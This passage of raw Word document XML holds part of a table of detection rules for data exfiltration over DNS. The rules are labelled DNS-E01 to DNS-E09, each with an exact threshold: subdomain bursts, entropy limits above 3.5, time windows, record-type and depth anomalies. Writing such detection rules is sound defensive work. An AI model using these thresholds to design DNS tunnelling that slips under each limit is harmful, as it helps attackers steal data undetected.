          </w:tcPr>
          <w:p w14:paraId="5B4CB561" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28D73D8E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rapid unique subdomain burst</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="646138F7" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;10 unique subdomains to same base domain w</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>ithin 60s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00D34768" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6EC03707" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="419AD87C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C6FF32C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>High-entropy accumulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="1DD0CEEE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;15 unique entropy &gt;3.5 subdomains within 30min</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6E9F4252" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6F603747" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5F0BEF78" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="67EEA608" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rolling window entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="49648022" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Sliding 60min: &gt;10 entropy &gt;3.5 queries, same domain, same source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2F948287" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="208CB0A6" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="59358E83" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="76A90AD5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Encoding-agnostic entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="4E118603" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Shannon entropy &gt;3.5 on any label &gt;20 chars, any character set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="114F0C04" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>4a/4b/4c</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="2C8C0CB5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="506196D0" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E05a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4AE3807B" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>All-record-type inspection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="14C4BD23" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Entropy rules on ALL query types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5A98A202" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="6FA74E29" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="13D03766" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E05b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="35EA0E03" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Record type anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6F284747" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Unusual TXT/MX/CNAME volume from endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="774365DA" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="263C22EF" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="006E5F61" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E06a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="254DAFAE" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Subdomain depth anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="30597CD5" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;3 levels + combined entropy &gt;3.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7416B574" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1C7AFCD4" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="6C14E963" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E06b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="794A6E80" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Concatenated label entropy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="377E284D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Entropy on all labels concatenated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="7DDCD8ED" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="1DE39760" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="354206E4" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E07a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="410F234F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Structured label pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7CCA564D" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>[word]-[encoded]-[counter] pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="795DC88C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="0209BCC9" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="3F3302BC" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E07b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="22FCBD5E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Domain baseline anomaly</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="54F9752C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Queries to never-before-seen domains</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="0110F167" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="67CF3B8D" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A9C1F9F" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6275E95E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Long-horizon accumulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="60869B21" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Rolling 24h: &gt;20 entropy queries to novel domain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="26FA34FB" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005B2212" w14:paraId="5B79DCDA" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="142C7D2C" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>DNS-E09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="09CAB883" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Burst-pause correlation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
          </w:tcPr>
          <w:p w14:paraId="41151D8E" w14:textId="77777777" w:rsidR="005B2212" w:rsidRDefault="002170E7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>&gt;3 queries in 10s + silence &gt;30s, repeated 3+</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
